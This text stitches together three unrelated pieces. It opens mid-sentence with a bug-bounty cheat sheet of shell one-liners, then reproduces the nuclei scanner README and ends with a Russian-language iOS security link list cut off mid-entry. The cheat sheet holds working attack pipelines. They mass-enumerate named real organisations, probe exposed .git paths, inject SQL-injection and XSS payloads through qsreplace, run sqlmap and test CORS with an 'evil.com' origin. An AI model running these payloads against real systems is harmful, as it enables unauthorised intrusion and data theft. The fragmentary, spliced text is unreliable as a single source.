doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null" ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
<h1 align="left"> <img src="static/nuclei-logo.png" alt="nuclei" width="200px"></a> <br> </h1> [![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT) [![Go Report Card](https://goreportcard.com/badge/github.com/projectdiscovery/nuclei)](https://goreportcard.com/report/github.com/projectdiscovery/nuclei) [![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei/issues) Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. Nuclei is used to send requests across targets based on a template leading to zero false positives and providing effective scanning for known paths. Main use cases for nuclei are during initial reconnaissance phase to quickly check for low hanging fruits or CVEs across targets that are known and easily detectable. It uses [retryablehttp-go library](https://github.com/projectdiscovery/retryablehttp-go) designed to handle various errors and retries in case of blocking by WAFs, this is also one of our core modules from custom-queries. We have also [open-sourced a dedicated repository](https://github.com/projectdiscovery/nuclei-templates) to maintain various type of templates, we hope that you will contribute there too. Templates are provided in hopes that these will be useful and will allow everyone to build their own templates for the scanner. Checkout the guide at [**GUIDE.md**](https://github.com/projectdiscovery/nuclei-templates/blob/master/GUIDE.md) for a primer on nuclei templates. # Resources - [Resources](#resources) - [Features](#features) - [Usage](#usage) - [Installation Instructions](#installation-instructions) - [Prerequisite](#prerequisite) - [From Binary](#from-binary) - [From Source](#from-source) - [Running nuclei](#running-nuclei) - [1. Running nuclei with single template](#1-running-nuclei-with-a-single-template) - [2. Running nuclei with multiple template](#2-running-nuclei-with-multiple-templates) - [Thanks](#thanks) # Features <h1 align="left"> <img src="static/nuclei-run.png" alt="nuclei" width="700px"></a> <br> </h1> - Simple and modular code base making it easy to contribute. - Fast And fully configurable using a template based engine. - Handles edge cases doing retries, backoffs etc for handling WAFs. - Smart matching functionality for zero false positive scanning. # Usage ```bash nuclei -h ``` This will display help for the tool. Here are all the switches it supports. | Flag | Description | Example | |----------|-------------------------------------------------------|----------------------------| | -c | Number of concurrent requests (default 10) | nuclei -c 100 | | -l | List of urls to run templates | nuclei -l urls.txt | | -t | Templates input file/files to check across hosts | nuclei -t git-core.yaml | | -t | Templates input file/files to check across hosts | nuclei -t "path/*.yaml" | | -nC | Don't Use colors in output | nuclei -nC | | -o | File to save output result (optional) | nuclei -o output.txt | | -silent | Show only found results in output | nuclei -silent | | -retries | Number of times to retry a failed request (default 1) | nuclei -retries 1 | | -timeout | Seconds to wait before timeout (default 5) | nuclei -timeout 5 | | -v | Show Verbose output | nuclei -v | | -version | Show version of nuclei | nuclei -version | # Installation Instructions ### From Binary The installation is easy. You can download the pre-built binaries for your platform from the [Releases](https://github.com/projectdiscovery/nuclei/releases/) page. Extract them using tar, move it to your `$PATH`and you're ready to go. ```bash > tar -xzvf nuclei-linux-amd64.tar > mv nuclei-linux-amd64 /usr/bin/nuclei > nuclei -h ``` ### From Source nuclei requires go1.13+ to install successfully. Run the following command to get the repo - ```bash > GO111MODULE=on go get -u -v github.com/projectdiscovery/nuclei/cmd/nuclei ``` In order to update the tool, you can use -u flag with `go get` command. # Running nuclei ### 1. Running nuclei with a single template. This will run the tool against all the hosts in `urls.txt` and returns the matched results. ```bash > nuclei -l urls.txt -t git-core.yaml -o results.txt ``` You can also pass the list of hosts at standard input (STDIN). This allows for easy integration in automation pipelines. This will run the tool against all the hosts in `urls.txt` and returns the matched results. ```bash > cat urls.txt | nuclei -t git-core.yaml -o results.txt ``` ### 2. Running nuclei with multiple templates. This will run the tool against all the hosts in `urls.txt` with all the templates in the `path-to-templates` directory and returns the matched results. ```bash > nuclei -l urls.txt -t "path-to-templates/*.yaml" -o results.txt ``` ### 3. Automating nuclei with subfinder and any other similar tool. ```bash > subfinder -d hackerone.com | httprob | nuclei -t "path-to-templates/*.yaml" -o results.txt ``` Nuclei supports glob expression ending in `.yaml` meaning multiple templates can be easily passed to be executed one after the other. Please refer to [this guide](https://github.com/projectdiscovery/nuclei-templates/blob/master/GUIDE.md) to build your own custom templates. # Thanks nuclei is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team. Community contributions have made the project what it is. See the **[Thanks.md](https://github.com/projectdiscovery/nuclei/blob/master/THANKS.md)** file for more details. Do also check out these similar awesome open-source projects that may fit in your workflow: [https://github.com/jaeles-project/jaeles](https://github.com/jaeles-project/jaeles)</br> [https://github.com/ameenmaali/qsfuzz](https://github.com/ameenmaali/qsfuzz)</br> [https://github.com/proabiral/inception](https://github.com/proabiral/inception)</br> [https://github.com/hannob/snallygaster](https://github.com/hannob/snallygaster)</br>
# iOS Security Awesome В данном репозитории собранны материалы по безопасности iOS-приложений, различные статьи, исследования, инструменты анализа и полезные библиотеки/инструменты для обеспечения безопасности приложений. Большая часть этого материала приходит из телеграм канала [Mobile AppSec World](https://t.me/mobile_appsec_world) и его подписчиков. Репозиторий регулярно обновляется и пополняется новыми материалами. ![Awesome-DevSecOps-iOS](https://user-images.githubusercontent.com/54852618/163576691-d55b3936-92c7-4232-9316-e5202f78c2ff.png) ## Инструменты анализа * [bagbak](https://github.com/ChiChou/bagbak) * [PassionFruit]() * [GrapeFruit]() * [IOS Security Suite](https://github.com/securing/IOSSecuritySuite) * [Blocking Jailbreak Detection Tweaks](https://ios.cfw.guide/blocking-jailbreak-detection/#tweaks) * [NetworkSniffer](https://github.com/evilpenguin/NetworkSniffer) - NetworkSniffer will log ALL traffic for any iOS application. This includes WKWebView and UIWebView. * [Ghidra iOS kernelcache framework for reverse engineering](https://github.com/0x36/ghidra_kernelcache/) * [frida-ios-dump](https://github.com/AloneMonkey/frida-ios-dump) * [dumpdecrypted](https://github.com/stefanesser/dumpdecrypted) * [Yet Another Code Decrypter](https://github.com/DerekSelander/yacd) * [xpcspy - Bidirectional XPC message interception and more](https://github.com/hot3eed/xpcspy) * [checkra1n jailbreak](https://checkra.in/) * [Frida](https://github.com/frida/frida/releases) * [Objection - mobile exploration toolkit by Frida](https://github.com/sensepost/objection) * [Bfinject](https://github.com/BishopFox/bfinject) * [iFunbox](http://www.i-funbox.com/) * [Libimobiledevice - library to communicate with the services of the Apple ios devices](https://www.libimobiledevice.org/) * [iRET (iOS Reverse Engineering Toolkit)](https://www.veracode.com/sites/default/files/Resources/Tools/iRETTool.zip) - includes oTool, dumpDecrypted, SQLite, Theos, Keychain_dumper, Plutil * [Burp Suite](https://portswigger.net/burp/communitydownload) * [Cycript](https://cydia.saurik.com/api/latest/3) * [iLEAPP - iOS Logs, Events, And Preferences Parser](https://github.com/abrignoni/iLEAPP) * [Cutter - Free and Open Source RE Platform powered by radare2](https://cutter.re/) * [decrypt0r - automatically download and decrypt SecureRom stuff](https://github.com/shinvou/decrypt0r) * [Mobile-Security-Framework MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF) * [Runtime Mobile Security (RMS) - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security) * [fridax](https://github.com/NorthwaveSecurity/fridax) * [MOBEXLER](https://mobexler.com/) * [Generate Malformed QRCodes](https://github.com/h0nus/QRGen) * [Tool for Injecting Malicious Payloads Into Barcodes](https://github.com/huntergregal/scansploit) * [AFL - american fuzzy lop](https://lcamtuf.coredump.cx/afl/) * [Setup for i0S and Android Application Analysis](https://m2sup3rn0va.github.io/SiAAA/) - This is a cheatsheet to install tools required for i0S and Android application pentesting * [AES Killer (Burpsuite Plugin)](https://github.com/Ebryx/AES-Killer) * [ReFlutter](https://github.com/Impact-I/reFlutter) * [Lief](https://github.com/lief-project/LIEF) * [Mobile Verification Toolkit](https://github.com/mvt-project/mvt) * [Hack for SpringBoard to prevent kill process](https://gist.github.com/hexploitable/5a2318f89fb696da772430bfbb864cd9) ## Инструменты защиты * [EllipticCurveKeyPair](https://github.com/agens-no/EllipticCurveKeyPair) - Sign, verify, encrypt and decrypt using the Secure Enclave on iOS and MacOS. ## Уязвимые приложения * [Myriam iOS](https://github.com/GeoSn0w/Myriam) * [ExploitMe Mobile iPhone Labs](http://securitycompass.github.io/iPhoneLabs/) * [Owasp: iGoat](https://github.com/hankbao/owasp-igoat) * [Damn Vulnerable iOS App (DVIA)](https://github.com/prateek147/DVIA) * [Damn Vulnerable iOS App (DVIA) v2](https://github.com/prateek147/DVIA-v2) * [DVIA Walkthrow](https://philkeeble.com/categories/#ios) * [OWASP: OMTG-Hacking-Playground](https://github.com/OWASP/OMTG-Hacking-Playground) * Magnet Virtual Summit 2020 CTF (iOS) * [writeup 1](https://www.stark4n6.com/2020/06/magnet-virtual-summit-2020-ctf-ios.html) * [writeup 2](https://dfir300.blogspot.com/2020/06/mvs2020ctf-write-up-ios.html) * [r2con2020 iOS Challenge 2](https://github.com/hexploitable/r2con2020_r2frida/blob/master/ios-challenge-2.ipa) * [iOS Anti-Tampers Bypass](https://rodnt.github.io/post/2022-03-20-ios-antitampers-bypass/) ## Видео ### En * [iOS Application Vulnerabilities and how to find them](https://www.youtube.com/watch?v=2CKrw7ErzCY) * [Attacking iPhone XS Max](https://www.youtube.com/watch?v=8cOx7vfszZU&feature=youtu.be) * [Behind the Scenes of iOS Security](https://www.youtube.com/watch?v=BLGFriOKz6U) * [Analyzing and Attacking Apple Kernel Drivers](https://www.youtube.com/watch?v=07VqX4bbXTI) * [Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox](https://www.youtube.com/watch?v=bP5VP7vLLKo) * [Demystifying the Secure Enclave Processor](https://www.youtube.com/watch?v=7UNeUT_sRos) * [HackPac Hacking Pointer Authentication in iOS User Space](https://www.youtube.com/watch?v=DJFxhShJ6Ns) * [iOS 10 Kernel Heap Revisited](https://www.youtube.com/watch?v=DNW6Im31lQo) * [Recreating An iOS 0-Day Jailbreak Out Of Apple's Security Updates](https://www.youtube.com/watch?v=p512McKXukU) * [Building Secure iOS Apps (you don’t have to learn it the hard way!)](https://www.youtube.com/watch?v=b6LI6j_aJ9k) * [The Worst Mobile Apps](https://www.youtube.com/watch?v=9JuBUpRPLRs) * [Learn modding Unity apps and games with Frida](https://www.youtube.com/watch?v=KeWcZ-Dd6tA) ## Подкасты * [Мобильный SSDLC](https://youtu.be/EGB8mstJlyA) ## Статьи ### Ru * [Ваш фонарик может отправлять SMS](https://habr.com/ru/company/pt/blog/155937/) * [Процесс загрузки iPhone. Часть 1: Boot ROM](https://habr.com/ru/post/556582/) * [Гайд по реверсу iOS приложения на примере ExpressVPN](https://habr.com/ru/post/569034/) * [Взлом и внедрение своего кода в чужое iOS-приложение](https://habr.com/ru/company/jugru/blog/570220/) * [Безопасность iOS-приложений: гайд для новичков](https://habr.com/ru/company/wrike/blog/544754/) * [Just for fun: Сколько «живет» iOS до Jailbreak](https://habr.com/ru/company/swordfish_security/blog/525772/) ### En #### Frida * [iOS Swift Anti-Jailbreak Bypass with Frida](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/) * [Gotta Catch 'Em All: Frida & jailbreak detection](https://www.romainthomas.fr/post/21-07-pokemongo-anti-frida-jailbreak-bypass/) * [Beginning Frida: Learning Frida use on Linux and (just a bit on) Wintel and Android systems with Python and JavaScript (Frida. hooking, and other tools)](https://www.amazon.com/Beginning-Frida-Learning-Android-JavaScript/dp/B094ZQ1HHC) * [Learn how to use Frida with Unity app](https://github.com/kylesmile1103/Learn-Frida) #### Прочее * [iOS Write ups](https://github.com/writeups/iOS) * [iOS Internals & Security Testing](https://rentry.co/newvw) * [Hacking iOS Simulator with simctl and dynamic libraries](https://curvedlayer.com/2020/08/09/ios-simulator-plugin-simctl.html) * [Psychic Paper](https://siguza.github.io/psychicpaper/) * [Stealing your SMS messages with iOS 0day](https://wojciechregula.blog/post/stealing-your-sms-messages-with-ios-0day/) * [Zero-day in Sign in with Apple](https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/) * [Return of the ios sandbox escape: lightspeeds back in the race](https://www.synacktiv.com/en/publications/return-of-the-ios-sandbox-escape-lightspeeds-back-in-the-race.html) * [PIN Selection on Smartphones](https://this-pin-can-be-easily-guessed.github.io/) * [A survey of recent iOS kernel exploits](https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html) * [Apple Two-Factor Authentication: SMS vs. Trusted Devices](https://blog.elcomsoft.com/2020/06/apple-two-factor-authentication-sms-vs-trusted-devices/) * [Intercepting Flutter traffic on iOS](https://blog.nviso.eu/2020/06/12/intercepting-flutter-traffic-on-ios/) * [Snapchat detection on iOS](https://aeonlucid.com/Snapchat-detection-on-iOS/) * [Writing an iOS Kernel Exploit from Scratch](https://secfault-security.com/blog/chain3.html) * [The Four Ways to Deal with iPhone Backup Passwords](https://blog.elcomsoft.com/2020/07/4-ways-to-handle-iphone-backup-passwords/) * [Extracting and Decrypting iOS Keychain: Physical, Logical and Cloud Options Explored](https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/) * [iOS Kernel Explotation - One Byte to rule them all](https://googleprojectzero.blogspot.com/2020/07/one-byte-to-rule-them-all.html) * [Modern iOS Application Security](https://www.infoq.com/presentations/ios-security/) * [Reverse Engineering iOS Mobile Apps](https://www.bugcrowd.com/resources/webinars/reverse-engineering-ios-mobile-apps/) * [KTRW: The journey to build a debuggable iPhone](https://media.ccc.de/v/36c3-10806-ktrw_the_journey_to_build_a_debuggable_iphone) * [The One Weird Trick SecureROM Hates](https://media.ccc.de/v/36c3-11238-the_one_weird_trick_securerom_hates) * [Tales of old: untethering iOS 11-Spoiler: Apple is bad at patching](https://media.ccc.de/v/36c3-11034-tales_of_old_untethering_ios_11) * [Messenger Hacking: Remotely Compromising an iPhone through iMessage](https://media.ccc.de/v/36c3-10497-messenger_hacking_remotely_compromising_an_iphone_through_imessage) * [Reverse Engineering the iOS Simulator’s SpringBoard](https://vimeo.com/231806976) * [Most usable tools for iOS penetration testing](https://github.com/ansjdnakjdnajkd/iOS) * [iOS-Security-Guides](https://github.com/0xmachos/iOS-Security-Guides) * [Trust in Apple's Secret Garden: 